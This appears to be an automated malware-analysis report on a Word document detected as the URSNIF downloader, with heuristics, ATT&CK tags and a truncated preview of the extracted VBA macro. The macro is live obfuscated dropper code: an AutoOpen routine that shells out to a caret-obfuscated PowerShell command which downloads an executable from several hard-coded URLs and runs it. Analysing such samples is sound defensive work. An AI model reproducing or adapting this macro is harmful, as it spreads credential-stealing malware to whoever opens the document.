MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.URSNIF-6729855-3. Static analysis revealed a VBA macro with an AutoOpen function that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The presence of the AutoOpen macro and the Shell() call are strong indicators of downloader functionality.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5200 bytes |
SHA-256: 185a764c56d3f8f78a9e1cdd65dc149f723ccaf6abc20aa49cd7c8ea6f14eaff |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "oYiVGZzE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "m" + "5280"
Hour "304838636" + "dTQ"
Hour "4458" + "318351277" + "326037795" + "103800552"
VBA.Shell CleanString(nm) + jTqWBtrAUDTHtd + mvccYswrKTpY + oNtklQTSR + AzfUkRiwcMj + opbfF + icIjQaLvmcw + QwkhXoXw, 49 - 49
Hour "YYr" + "zMhETV" + "YrwMMYVr" + "2315"
End Sub
Attribute VB_Name = "dljiuZmRkHhnSk"
Function oNtklQTSR()
On _
Error _
Resume _
Next
Hour "108129520" + "A"
Hour "MKR" + "j" + "4485" + "2224"
Hour "46485342" + "WmZsEdsVwz"
Hour "piDowwQshErYi" + "907"
UCJhptXVl = "c" + "md /V^" + ":O/C" + Chr(4 + 1 + 2 + 0 + 27) + "^" + "s^e^t ^" + "7^y^w^x" + "=^ ^" + " ^ ^"
Hour "qisv" + "IAEn"
Hour "8879" + "60714581" + "9653" + "HrkkmCRvB"
baYUiaN = " ^ " + "^ " + " ^" + " " + "^ ^ ^" + " ^" + " ^" + "}^}{" + "^hcta" + "c^};ka^" + "er^b^;^" + "z^BL" + "$ m^et"
Hour "djC" + "wIHi" + "273149115" + "tnvpAbZaoBtW"
Hour "2525" + "80392583" + "MNDAKFNk" + "wmQ"
Hour "fK" + "wmAndYtHF" + "AmiiYdGWhCZ" + "207407232"
Hour "HAijtjjLM" + "59807140"
wnwWZaJ = "I" + "^-^" + "ekovn" + "^" + "I" + "^" + ";" + ")zBL$" + "^ ,^S" + "^uS^$" + "(e^" + "liF^d^" + "a^o^"
Hour "477548143" + "hWKNPQ"
Hour "61542299" + "L" + "533581375" + "7352"
Hour "98997423" + "pnwVkwXQziPN"
AbiZUi = "l" + "n^wo^" + "D^.j" + "d^U^$" + "^{yr^t{" + ")Nf^m" + "$" + "^ ni" + "^ ^S"
Hour "uXDwRjbuLaZL" + "431453555" + "9954" + "109614183"
Hour "Y" + "OqpSGwkWS"
Hour "344382555" + "PswKbjh"
NDPpVKpv = "uS^$" + "(" + "^hca" + "er^of^" + ";'ex" + "e.^'+HC" + "r$^+^" + "'^\'+c" + "i^l"
Hour "DnLrkJWz" + "246964424" + "461544300" + "njliNfjPvz"
Hour "Ihwt" + "5220" + "frJQrb" + "KSzihKNWpiA"
EMiADWiSUw = "b^u^p^" + ":vn^e^" + "$=zB" + "L$^;^'^" + "0^0" + "^5^' =^" + " ^HCr^$" + ";)'@'(" + "ti^l^p" + "^S^." + "'t^Q^08" + "vr" + "9//lp"
Hour "1481" + "371078970" + "324" + "658"
Hour "523308218" + "7814" + "dLzzWL" + "j"
Hour "2326" + "Birf"
tOzww = "^.siwre" + "s-" + "s" + "a^" + "m^u^" + "w" + "^d//:p^"
oNtklQTSR = UCJhptXVl + baYUiaN + wnwWZaJ + AbiZUi + NDPpVKpv + EMiADWiSUw + tOzww
Hour "CSPVJztlmK" + "7937"
Hour "Fnc" + "Pswzhn"
Hour "163062227" + "7280"
Hour "nDw" + "PGoFw" + "EAYdOGuiB" + "299309706"
Hour "2119" + "6494" + "K" + "R"
End Function
Function AzfUkRiwcMj()
On _
Error _
Resume _
Next
Hour "443444131" + "9909" + "tjcTn" + "aPLD"
Hour "106118252" + "YuvupbUNa"
Hour "NhkuQXQ" + "ZFYY" + "ULzd" + "idi"
GntdVz = "t^th@Sz" + "F^" + "7ps^" + "Q^y" + "/r^i." + "^fir^a"
Hour "9939" + "51458115" + "499664232" + "hNF"
Hour "456011564" + "4923" + "dar" + "MtXb"
Hour "p" + "5742219" + "206611842" + "208206566"
fCrNwG = "h^sra" + "^ja^" + "h//" + ":^p^t" + "t" + "^" + "h^@VUj" + "GH^" + "f3G/m" + "^" + "oc.inak" + "ku" + "^d"
Hour "LEzSAalhULB" + "8871"
Hour "1872" + "1938"
wjpYsziVXFG = "r^in" + "ye^pu" + "s" + "^mok//" + ":^p^" + "tth@^"
Hour "mIqG" + "Id" + "zQPJi" + "KFPQljCf"
Hour "Q" + "jbhf" + "woMmzu" + "ZtTLTvTZd"
Hour "264140635" + "br" + "8353" + "jBmrLInv"
WtmbG = "WW^" + "e5dn^Q" + "V" + "R6/" + "^lc^." + "ru" + "^o^" + "t^an" + "^a^m//" + ":pt" + "^t^h^"
Hour "8035" + "502" + "ZEB" + "219063334"
Hour "PDIh" + "fJkk" + "JqDIsr" + "GSifhSt"
Hour "100772543" + "mNaBhYVk" + "w" + "GVaLiiSQ"
AqSph = "@I" + "N^" + "Qu^" + "6n^x/" + "gr^" + "o.^h" + "^hn^" + "ye"
Hour "71578749" + "lORiGF"
Hour "K" + "452712436"
Hour "63330226" + "Eiql" + "uEhDQTv" + "DC"
Hour "391852726" + "bXcdHLTQ" + "Jjoa" + "241087631"
WBqiM = "r^a" + "^ew//^" + ":pt" + "t^h" + "^'=" + "N" + "f" + "m" + "$^"
Hour "8456" + "451652646" + "1500" + "499076007"
Hour "RuC" + "342483993" + "5630" + "6080"
vvvAZuCcO = ";^tn" + "^e" + "^ilC^b" + "eW." + "t^eN tc" + "e^j^
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.